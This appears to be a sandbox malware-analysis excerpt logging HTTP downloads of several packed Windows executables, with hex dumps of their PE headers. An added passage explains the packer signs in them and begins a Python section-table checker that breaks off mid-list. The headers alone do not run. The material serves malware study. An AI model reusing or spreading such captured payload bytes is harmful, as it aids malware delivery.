Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:17 GMTContent-Type: application/octet-streamContent-Length: 1864192Last-Modified: Sat, 30 Nov 2024 03:04:48 GMTConnection: keep-aliveETag: "674a80d0-1c7200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 3a 9b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 58 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 50 05 00 00 02 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 70 05 00 00 02 00 00 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 6f 64 75 79 62 67 00 e0 19 00 00 d0 2f 00 00 dc 19 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 65 61 71 76 7a 76 63 69 00 10 00 00 00 b0 49 00 00 06 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 50 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:26 GMTContent-Type: application/octet-streamContent-Length: 1840128Last-Modified: Sat, 30 Nov 2024 03:04:55 GMTConnection: keep-aliveETag: "674a80d7-1c1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e8 97 48 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 83 e5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 71 77 6e 6b 75 61 79 00 80 1a 00 00 10 50 00 00 74 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6c 72 73 63 6d 6b 70 00 10 00 00 00 90 6a 00 00 06 00 00 00 ec 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 f2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:34 GMTContent-Type: application/octet-streamContent-Length: 922112Last-Modified: Sat, 30 Nov 2024 03:03:02 GMTConnection: keep-aliveETag: "674a8066-e1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e 80 4a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 62 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 75 5f 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 18 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 a6 00 00 00 40 0d 00 00 a8 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:42 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:28 GMTConnection: keep-aliveETag: "674a8080-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 4467200Last-Modified: Sat, 30 Nov 2024 01:19:55 GMTConnection: keep-aliveETag: "674a683b-442a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 65 49 49 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 4f 00 00 d8 78 00 00 32 00 00 00 c0 ca 00 00 10 00 00 00 60 4f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 ca 00 00 04 00 00 0a 72 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 30 76 00 73 00 00 00 00 20 76 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9d ca 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 9d ca 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 76 00 00 10 00 00 00 3c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 76 00 00 02 00 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 76 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 38 00 00 40 76 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 79 69 6a 74 61 62 62 00 c0 1b 00 00 f0 ae 00 00 b2 1b 00 00 52 28 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 63 6b 62 76 70 6f 6f 7a 00 10 00 00 00 b0 ca 00 00 04 00 00 00 04 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 ca 00 00 22 00 00 00 08 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:30 GMTConnection: keep-aliveETag: "674a8082-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:07:05 GMTContent-Type: application/octet-streamContent-Length: 2038784Last-Modified: Sat, 30 Nov 2024 01:37:00 GMTConnection: keep-aliveETag: "674a6c3c-1f1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 d9 52 43 b2 b8 3c 10 b2 b8 3c 10 b2 b8 3c 10 ac ea b8 10 ac b8 3c 10 ac ea a9 10 ad b8 3c 10 ac ea bf 10 cd b8 3c 10 95 7e 47 10 b1 b8 3c 10 b2 b8 3d 10 33 b8 3c 10 ac ea b6 10 b3 b8 3c 10 ac ea a8 10 b3 b8 3c 10 ac ea ad 10 b3 b8 3c 10 52 69 63 68 b2 b8 3c 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 18 5b c6 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 05 00 00 ec 00 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 a1 26 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 60 06 00 34 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c ff 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 ae 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 34 82 00 00 00 60 06 00 00 3c 00 00 00 be 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 
f0 06 00 00 02 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 00 07 00 00 02 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6c 67 66 72 74 61 73 00 00 1b 00 00 40 31 00 00 f6 1a 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 70 71 64 69 7a 68 00 10 00 00 00 40 4c 00 00 06 00 00 00 f4 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 fa 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
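The section tables in the response dumps above are the concrete evidence behind the "PE file contains section with special chars" and "Detected unpacking (changes PE section rights)" signatures: a first section whose name is spaces, ".idata" padded with trailing spaces, eight-letter random names such as xbmfzvhb and ztggrlpz, a ".taggant" section, and sections flagged 0xE0000040 (code, readable, writable and executable). The Python below is an added example for this page, not code from Joe Sandbox or from the sample; it walks a PE section table from raw bytes and applies those checks. Only the six 40-byte section headers are transcribed byte-for-byte from the 2765824-byte response dump; the MZ/COFF scaffolding around them is constructed so the parser can run offline, and the list of "standard" section names is the author's own assumption.

```python
"""Added example: parse a PE section table and flag the packer tells seen above."""
import struct
import sys
from dataclasses import dataclass
from typing import List, Tuple

# Six 40-byte IMAGE_SECTION_HEADER entries transcribed from the 2765824-byte
# payload's header dump above; they start at file offset 0x178 in that file.
SECTION_HEADERS_HEX = [
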